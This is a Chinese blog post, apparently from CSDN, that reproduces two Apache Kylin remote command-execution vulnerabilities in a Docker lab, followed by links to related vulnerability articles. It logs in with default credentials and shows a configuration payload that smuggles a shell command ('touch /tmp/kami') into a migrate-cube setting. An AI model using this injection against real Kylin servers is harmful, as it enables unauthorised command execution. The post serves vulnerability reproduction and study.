Cve-2020-1956\Cve-2020-13925复现

最新推荐文章于 2023-07-31 19:59:46 发布
最新推荐文章于 2023-07-31 19:59:46 发布
阅读量1.9k 收藏
点赞数
分类专栏: 复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mukami0621/article/details/109202559
版权

参考:https://paper.seebug.org/1237/

http://www.ijiandao.com/2b/baijia/373874.html

这两个都是Kylin下的漏洞,放在一起复现了

环境:Kylin 官网文档 http://kylin.apache.org/cn/docs/install/kylin_docker.html

0x1 docker里下环境
在这里插入图片描述
0x2 运行docker

docker run -d \
-m 8G \
-p 7070:7070 \
-p 8088:8088 \
-p 50070:50070 \
-p 8032:8032 \
-p 8042:8042 \
-p 16010:16010 \
apachekylin/apache-kylin-standalone:3.0.1

注意:login的页面要等一会儿才能出来(一开始一直没有页面还以为是哪里有问题查了一会儿…

0x3 使用默认密码 admin/KYLIN 登录
在这里插入图片描述
0x01 Cve-2020-1956:

0x001 修改配置:

kylin.tool.auuto-migrate-cube.enabled=true
kylin.tool.auto-migrate-cube.src-config=/home/admin/apache-kylin-3.0.1-bin-hbase1x/conf/kylin.propertie
kylin.server.cluster-name=kylin_metadata
kylin.tool.auto-migrate-cube.dest-config=/tmp/kylin.properties kylin_streaming_cube learn_kylin true true true true;touch /tmp/kami;echo

在这里插入图片描述0x002 发包,可以看到返回200
在这里插入图片描述
0x003 进入查看(docker exec -it bash),可以看到我们写进配置的语句被执行了,生成文件成功
在这里插入图片描述
0x02 Cve-2020-13925:

0x001 选择一个项目,点击diagnosis,抓包
在这里插入图片描述
在这里插入图片描述0x002 改包,即可
在这里插入图片描述
这里有一个额外的知识:关于burp的collaborator模块
参考:https://github.com/0xs1riu5/Writeup

mukami0621
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
Apache Kylin 远程命令执行漏洞复现[CVE-2020-13925]
0xSec
12-25 863
Apache Kylin™是一个开源的分布式分析引擎,提供Hadoop之上的SQL查询接口及多维分析(OLAP)能力以支持超大规模数据,最初由eBay Inc. 开发并贡献至开源社区。它能在亚秒内查询巨大的Hive表。
Apache Kylin远程代码执行漏洞(CVE-2020-1956复现
锋刃科技的博客
03-05 1292
简介 Apache Kylin是美国 Apache软件基金会的一款开源的分布式分析型数据仓库。该产品主要提供 Hadoop/Spark之上的 SQL查询接口及多维分析(OLAP)等功能。 漏洞概述 在Kylin中存在一些restful API,可以将操作系统命令与用户输入的字符串连接起来,由于未对用户输入内容做合理校验,导致攻击者可以在未经验证的情况下执行任意系统命令。 影响版本 Kylin 2.3.0-2.3.2 Kylin 2.4.0-2.4.1 Kyl...
拼接符 防注入正则校验_Apache Kylin 命令注入漏洞调试分析(CVE-2020-1956)
weixin_39633917的博客
12-01 205
1、前言Apache Kylin是一个开源的、分布式的分析型数据仓库,提供Hadoop/Spark 之上的 SQL 查询接口及多维分析(OLAP)能力以支持超大规模数据。近日,百度云安全团队监测到Apache官方发出了一个漏洞通告,披露了Apache kylin多版本存在命令注入漏洞,漏洞编号为CVE-2020-1956。由于Apache Kylin依赖的组件较多,自行搭建环境较为困难,我们采用了...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
apache poi 各版本对应jdk
single_kity的博客
09-09 7630
apache poi 各版本对应jdk 最近因为poi和jdk的版本对应问题,遇到了一些糟心的事。在此先记录一下吧,以免以后遇到 之前一直没找到,百度了半天都没有找到相关的说明,好在在官网找到了这个(英文不好,找起来也费劲) 现在基本都是jdk1.8了,但是很多老的项目还在用1.8之前的jdk poi 版本 对应jdk版本 poi 4.x 1.8+ poi 3.11 和3.x 以后的版本 1.6+ poi 3.5 - poi 3.10 1.5+ poi 3.5 之前 1.4+
c++获取一段代码的执行时间_Apache Kylin 远程代码执行漏洞CVE20201956
weixin_39885412的博客
11-21 107
2020年5月28日,Apache Kylin官方发布安全公告,披露了一个Apache Kylin远程代码执行漏洞。Kylin有一些restful API,可以将os命令与用户输入字符串连接起来,攻击者可以在Kylin没有任何保护或验证的情况下执行任何os命令。漏洞名称:Apache Kylin 远程代码执行漏洞CVE-2020-1956威胁等级:高危漏洞类型:远程代码执行利用难度:简单...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CVE-2020-8813 Cacti v1.2.8 RCE.MD
04-13
CVE-2020-8813 Cacti v1.2.8 RCE
CVE-2020-9484.tar
06-02
CVE-2020-9484 tomcat session反序列化漏洞分析与实验环境,配合docker容器,更方便快捷,一键式操作,一键式复现漏洞。你值得拥有。
【漏洞通告】Apache Kylin 远程命令执行漏洞(CVE-2020-1956
爱国小白帽
05-30 2014
【漏洞通告】Apache Kylin 远程命令执行漏洞(CVE-2020-1956) 原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 昨天 通告编号:NS-2020-0035 2020-05-29 TA****G: Apache Kylin、命令执行、CVE-2020-1956 漏****洞危害: 攻击者利用此漏洞,可实现远程命令执行,PoC已公开。 版本: 1.0 1 漏洞概述 近日,Apache官方发布安全公告,修复了一个Apache K
CVE-2020-1956 Apache kylin命令执行漏洞分析
afeng12345678的博客
07-31 333
Apache Kylin命令执行漏洞白盒复现分析。分析文章为本人原创,转载请注明出处。
openfeign 远程调用 status 404 not found_京东蓝军发现Apache Kylin 远程命令执行漏洞报告[CVE202013925]...
weixin_39621044的博客
11-28 336
6月,京东安全的蓝军团队发现了一个 apache kylin 远程命令执行严重漏洞( CVE-2020-13925)。黑客可以利用这个漏洞,登录任何管理员账号和密码默认未修改的账号,获得管理员权限。由于Apache Kylin被广泛应用于企业的大数据分析平台,因此该漏洞将对企业核心数据具有较大的危害,存在数据泄露风险,建议用户尽快升级软件至安全版本。关于ApacheKylinApach...
漏洞复现(包含近几年CVE)『持续更新中』
Zyu0
11-26 899
FTP服务端请求伪造漏洞(SSRF)Spring Boot服务端模板注入(SSTI)漏洞XML外部实体(XXE)注入漏洞获取root私钥ipython 8.0.0 远程命令执行漏洞(CVE-2022-21699)Exiftool远程代码执行漏洞(CVE-2021-22204)ImageMagrick命令执行漏洞(CVE-2020-29599)Cachet配置泄露漏洞利用(CVE-2021-39174)Linux系统内核漏洞(CVE-2022-2588)mpdf 代码注入漏洞
Exchange Server反序列化漏洞复现(CVE-2020-0688)
谢公子的博客
07-10 2543
漏洞描述: 漏洞产生的主要原因就是在Exchange ECP组件中发现,邮件服务在安装的过程中不会随机生成秘钥,也就是说所有默认安装的Exchange服务器中的validationKey和decryptionKey的值都是相同的,攻击者可以利用静态秘钥对服务器发起攻击,在服务器中以SYSTEM权限远程执行代码。 漏洞影响版本: Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 Microsoft Exchange Serve
Spring 安全漏洞 CVE-2020-5421复现
pandamig的博客
01-10 7644
Spring 安全漏洞 cve-2020-5421复现 漏洞概述 CVE-2020-5421 可通过jsessionid路径参数,绕过防御RFD攻击的保护。先前针对RFD的防护是为应对 CVE-2015-5211 添加的。 什么是RDF 反射型文件下载漏洞(RFD)是一种攻击技术,通过从受信任的域虚拟下载文件,攻击者可以获得对受害者计算机的完全访问权限。 影响版本 Spring Framework 5.2.0 - 5.2.8 Spring Framework 5.1.0 - 5.1.17 Spring
【Spring框架RFD漏洞 (CVE-2020-5421) 解决方案】
weixin_42864006的博客
08-12 3863
Spring框架RFD漏洞 (CVE-2020-5421) 解决方案
apache相关漏洞
m0_48520508的博客
09-30 4098
CVE-2019-17564-Apache Dubbo反序列化漏洞 CVE-2020-1938-Apache Tomcat文件包含漏洞 CVE-2020-1948-Apache Dubbo反序列化漏洞 CVE-2020-1956-Apache Kylin远程命令执行漏洞 CVE-2020-9480-Apache Spark远程代码执行漏洞 CVE-2020-9483-Apache SkyWalkingSQL注入漏洞
CVE-2020-16875复现
最新发布
09-14
为了复现CVE-2020-16875漏洞,您可以按照以下步骤进行操作: 1. 首先,您需要获取漏洞的POC代码。根据引用提供的信息,您可以从https://srcincite.io/pocs/cve-2020-16875.py.txt下载POC代码。 2. 在获得POC代码后,您需要在合适的环境中执行该代码。请确保您已经具备合适的权限,并且在测试环境中进行操作,以避免对真实系统造成损坏。 3. 执行POC代码后,它将尝试利用CVE-2020-16875漏洞攻击Microsoft Exchange Server。该漏洞允许远程攻击者在受影响的Exchange Server上执行任意代码。 4. 在执行POC代码之前,请确保已经阅读并理解了漏洞的风险和影响。同时,建议您在测试环境中进行演示,以避免对生产环境造成任何损害。 请注意,由于该漏洞可能导致严重的安全问题,建议您在使用POC代码或尝试复现漏洞之前,与您的系统管理员或安全团队进行协商和了解。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值